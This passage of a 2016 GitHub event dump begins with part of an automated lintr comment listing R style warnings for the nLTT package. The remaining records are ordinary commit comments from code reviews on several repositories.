superfluous.**\n```r\n​  t, nltt, data = df, geom = \"point\", ylim = c(0, 1), \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:152:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_get_nltt_values.R#L152) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0, 1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:152:103:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_get_nltt_values.R#L152) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0, 1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                      ^\n```\n[inst/doc/vignette_get_nltt_values.R:164:53:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_get_nltt_values.R#L164) *style:* **Trailing whitespace is superfluous.**\n```r\n​phylogenies <- c(phylogeny1, phylogeny2, phylogeny3, \n                                                    ^\n```\n[inst/doc/vignette_get_nltt_values.R:172:58:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_get_nltt_values.R#L172) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0, 1), \n                                                         ^\n```\n[inst/doc/vignette_get_nltt_values.R:178:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_get_nltt_values.R#L178) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0, 1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:178:103:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_get_nltt_values.R#L178) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0, 1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                      ^\n```\n[inst/doc/vignette_get_nltt_values.R:180:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_get_nltt_values.R#L180) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_nltt_statistic.R:21:22:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_nltt_statistic.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​  ape::rcoal(n = 10), \n                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:22:22:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_nltt_statistic.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​  ape::rcoal(n = 10), \n                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:23:16:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_nltt_statistic.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  species_tree, \n               ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_nltt_statistic.R#L39) *style:* **lines should not be more than 80 characters.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:39:20:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                   ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:34:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                                 ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:48:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                                               ^\n```\n[inst/doc/vignette_nltt_statistic.R:45:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_nltt_statistic.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n​  nLTT::nltt_lines(p, lwd = 3, lty = 2, col = grDevices::heat.colors(n = 4)[col_index])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:54:27:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_nltt_statistic.R#L54) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nltt_stats_exact[i]  <- nLTTstat_exact(species_tree, p)\n                          ^~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:55:27:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_nltt_statistic.R#L55) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nltt_stats_approx[i] <- nLTTstat(species_tree, p)\n                          ^~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:62:38:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_nltt_statistic.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nltt_stat_exact = nltt_stats_exact, \n                                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:69:14:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_nltt_statistic.R#L69) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nltt_stats, \n             ^\n```\n[inst/doc/vignette_nltt_statistic.R:70:21:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_nltt_statistic.R#L70) *style:* **Trailing whitespace is superfluous.**\n```r\n​  id.vars = c(\"id\"), \n                    ^\n```\n[inst/doc/vignette_nltt_statistic.R:76:13:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_nltt_statistic.R#L76) *style:* **Trailing whitespace is superfluous.**\n```r\n​  df$method, \n            ^\n```\n[inst/doc/vignette_nltt_statistic.R:82:13:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_nltt_statistic.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​  data = df, \n            ^\n```\n[inst/doc/vignette_nltt_statistic.R:89:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_nltt_statistic.R#L89) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:91:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/inst/doc/vignette_stretch_nltt_matrix.R#L91) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[tests/testthat/test_calculate_weight.R:2:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L2) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tweights <- rep(1, 2);\n^\n```\n[tests/testthat/test_calculate_weight.R:3:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tparticles <- list();\n^\n```\n[tests/testthat/test_calculate_weight.R:4:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:2) {\n^\n```\n[tests/testthat/test_calculate_weight.R:5:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tparticles[[i]] <- c(10, 10)\n^~\n```\n[tests/testthat/test_calculate_weight.R:5:17:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​\tweights <- rep(1, 2);\n               ~^\n```\n[tests/testthat/test_calculate_weight.R:6:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[tests/testthat/test_calculate_weight.R:6:19:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​\tparticles <- list();\n                 ~^~~\n```\n[tests/testthat/test_calculate_weight.R:7:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tsigma <- 1;\n^\n```\n[tests/testthat/test_calculate_weight.R:7:12:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L7) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:2) {\n           ^\n```\n[tests/testthat/test_calculate_weight.R:8:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tprior_density_function <- function(x) {\n^\n```\n[tests/testthat/test_calculate_weight.R:9:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tdunif(x[1], min=0, max=1000) *\n^~\n```\n[tests/testthat/test_calculate_weight.R:10:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tdunif(x[2], min=0, max=1000) }\n^~\n```\n[tests/testthat/test_calculate_weight.R:11:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:11:32:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\tprior_density_function <- function(x) {\n                              ~^~~\n```\n[tests/testthat/test_calculate_weight.R:12:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_equal(\n^\n```\n[tests/testthat/test_calculate_weight.R:13:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n^~\n```\n[tests/testthat/test_calculate_weight.R:13:46:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L13) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​\t\tdunif(x[2], min=0, max=1000) }\n                                             ^\n```\n[tests/testthat/test_calculate_weight.R:14:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n^~\n```\n[tests/testthat/test_calculate_weight.R:14:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L14) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:15:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ttolerance = 0.0001\n^~\n```\n[tests/testthat/test_calculate_weight.R:16:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_calculate_weight.R:16:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L16) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:16:61:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L16) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n                                                           ~^~\n```\n[tests/testthat/test_calculate_weight.R:16:90:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L16) *style:* **Commented code should be removed.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n                                                                                         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L17) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:17:61:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n                                                           ~^~\n```\n[tests/testthat/test_calculate_weight.R:18:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_equal(\n^\n```\n[tests/testthat/test_calculate_weight.R:19:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n^~\n```\n[tests/testthat/test_calculate_weight.R:20:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n^~\n```\n[tests/testthat/test_calculate_weight.R:20:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:21:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ttolerance = 0.0001\n^~\n```\n[tests/testthat/test_calculate_weight.R:22:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_calculate_weight.R:22:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L22) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:22:61:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n                                                           ~^~\n```\n[tests/testthat/test_calculate_weight.R:22:88:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n                                                                                       ^\n```\n[tests/testthat/test_calculate_weight.R:23:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:23:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L23) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:23:61:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n                                                            ^~\n```\n[tests/testthat/test_calculate_weight.R:24:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:26:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/15538ccc313ab3af967838fac7e5ff1ac2f5987a/tests/testthat/test_calculate_weight.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```"}},"created_at":"2016-09-14T09:21:31Z"}
{"id":"4560807693","type":"CommitCommentEvent","actor":{"login":"liusiyuan517"},"repo":{"name":"liusiyuan517/zouyizou_tom"},"payload":{"comment":{"id":19015058,"position":null,"line":null,"path":null,"commit_id":"ab66a6a0237ba3fee7d17d7ecf92703e2863001f","created_at":"2016-09-14T09:22:46Z","updated_at":"2016-09-14T09:22:46Z","body":"\r\n\r\n\r\n![xiaozhuangyuan](https://cloud.githubusercontent.com/assets/13961124/18506705/ced52a52-7a9f-11e6-8154-993bced16890.png)\r\n"}},"created_at":"2016-09-14T09:22:46Z"}
{"id":"4560808772","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":19015061,"position":46,"line":46,"path":"src/sbin/opnsense-auth","commit_id":"b90babbfd2425e201c372f631c47019572d0f4ac","created_at":"2016-09-14T09:23:00Z","updated_at":"2016-09-14T09:23:00Z","body":"Would be better to use mor concise splitting. Split() may be able to limit its substring count, 2 is what you want here. Does \"password=\" also return 2? If service is added, defaults need to be set or empty service rejected."}},"created_at":"2016-09-14T09:23:00Z"}
{"id":"4560809646","type":"CommitCommentEvent","actor":{"login":"interduo"},"repo":{"name":"lmsgit/lms"},"payload":{"comment":{"id":19015063,"position":null,"line":null,"path":null,"commit_id":"f359c95d187af58aa10e1f1e5d85ae06977659cc","created_at":"2016-09-14T09:23:12Z","updated_at":"2016-09-14T09:23:12Z","body":"Czy ten commit mógłby mieć zastosowanie również w 'nodeinfo' ?"}},"created_at":"2016-09-14T09:23:12Z"}
{"id":"4560811680","type":"CommitCommentEvent","actor":{"login":"VladDubrovskis"},"repo":{"name":"Financial-Times/o-ads"},"payload":{"comment":{"id":19015068,"position":null,"line":null,"path":null,"commit_id":"a40d797f7b93881b5f377decb9fcad62feaa1ee0","created_at":"2016-09-14T09:23:37Z","updated_at":"2016-09-14T09:23:37Z","body":"where is the test for this? :)"}},"created_at":"2016-09-14T09:23:37Z"}
{"id":"4560812408","type":"CommitCommentEvent","actor":{"login":"fengmk2"},"repo":{"name":"node-modules/urllib"},"payload":{"comment":{"id":19015070,"position":34,"line":228,"path":"lib/urllib.js","commit_id":"094b3b3eb29f570873de8232aac8e33b3f5a19d2","created_at":"2016-09-14T09:23:46Z","updated_at":"2016-09-14T09:23:46Z","body":"这里有 bug，应该传递 callback"}},"created_at":"2016-09-14T09:23:46Z"}
{"id":"4560814160","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":19015073,"position":46,"line":46,"path":"src/sbin/opnsense-auth","commit_id":"b90babbfd2425e201c372f631c47019572d0f4ac","created_at":"2016-09-14T09:24:10Z","updated_at":"2016-09-14T09:24:10Z","body":"I meant explode() 😊"}},"created_at":"2016-09-14T09:24:10Z"}
{"id":"4560817660","type":"CommitCommentEvent","actor":{"login":"adamniedzielski"},"repo":{"name":"jackkinsella/confessions"},"payload":{"comment":{"id":19015079,"position":1,"line":1,"path":"vendor/assets/javascripts/slickquiz.js","commit_id":"a11d81d8106b57f680a79fe4858dd9118b54e16d","created_at":"2016-09-14T09:24:51Z","updated_at":"2016-09-14T09:24:51Z","body":"Are there any chances of using an external package with this library rather than bundling it directly with the application ode?"}},"created_at":"2016-09-14T09:24:51Z"}
{"id":"4560823443","type":"CommitCommentEvent","actor":{"login":"Bk1312"},"repo":{"name":"Bk1312/App"},"payload":{"comment":{"id":19015090,"position":null,"line":null,"path":null,"commit_id":"8cb350d89bac9f445979d726cd36956b87205c44","created_at":"2016-09-14T09:26:01Z","updated_at":"2016-09-14T09:26:01Z","body":"Hello World"}},"created_at":"2016-09-14T09:26:01Z"}
{"id":"4560823828","type":"CommitCommentEvent","actor":{"login":"kinchar"},"repo":{"name":"kinchar/kinchar.GitHub.io"},"payload":{"comment":{"id":19015091,"position":null,"line":null,"path":null,"commit_id":"5ec113b6236985f6ff5950a87ad14bd39e4bd4c1","created_at":"2016-09-14T09:26:07Z","updated_at":"2016-09-14T09:26:07Z","body":"stuff"}},"created_at":"2016-09-14T09:26:07Z"}
{"id":"4560824813","type":"CommitCommentEvent","actor":{"login":"fps01"},"repo":{"name":"DevGroup-ru/dotplant-store"},"payload":{"comment":{"id":19015095,"position":8,"line":76,"path":"src/models/order/Payment.php","commit_id":"84bc9fc0ca36f287321fbfe3432223a70750226f","created_at":"2016-09-14T09:26:18Z","updated_at":"2016-09-14T09:26:18Z","body":"Этот момент я вынесу в отдельный метод, т.к. он используется не только здесь, а реализация однообразная"}},"created_at":"2016-09-14T09:26:18Z"}
{"id":"4560825973","type":"CommitCommentEvent","actor":{"login":"sunset1215"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":19015099,"position":null,"line":null,"path":null,"commit_id":"8a6bb342c38a7c4b22a182d7feda3c136317f284","created_at":"2016-09-14T09:26:32Z","updated_at":"2016-09-14T09:26:32Z","body":"@kwonn It's great! But you can see that your name was removed here. Perhaps you resolved using theirs/your version option? SourceTree allows you to sort of merge manually, in which you choose which lines to discard and which lines to keep. After that, you can mark it as resolved and commit the changes."}},"created_at":"2016-09-14T09:26:32Z"}
{"id":"4560832692","type":"CommitCommentEvent","actor":{"login":"tomalec"},"repo":{"name":"PuppetJs/PuppetJs"},"payload":{"comment":{"id":19015106,"position":14,"line":493,"path":"src/puppet.js","commit_id":"47cb56afa0c8611254ad72a04a3d707c6551e760","created_at":"2016-09-14T09:27:55Z","updated_at":"2016-09-14T09:27:55Z","body":"As far as I get your code, I didn't have to as it just forwards `bootstrap` callback. Plus, all tests excepts outdated ones (https://github.com/PuppetJs/PuppetJs/issues/103) were passing."}},"created_at":"2016-09-14T09:27:55Z"}
{"id":"4560833249","type":"CommitCommentEvent","actor":{"login":"adamniedzielski"},"repo":{"name":"jackkinsella/confessions"},"payload":{"comment":{"id":19015108,"position":65,"line":65,"path":"vendor/assets/stylesheets/slickquiz/slickquiz.css","commit_id":"a11d81d8106b57f680a79fe4858dd9118b54e16d","created_at":"2016-09-14T09:28:01Z","updated_at":"2016-09-14T09:28:01Z","body":"I think that if you decide to copy-paste CSS from a library then it's better to keep customizations in a separate file. This one may be a bit unexpected and overlooked by someone who is (for example) willing to replace the file with a newer version."}},"created_at":"2016-09-14T09:28:01Z"}
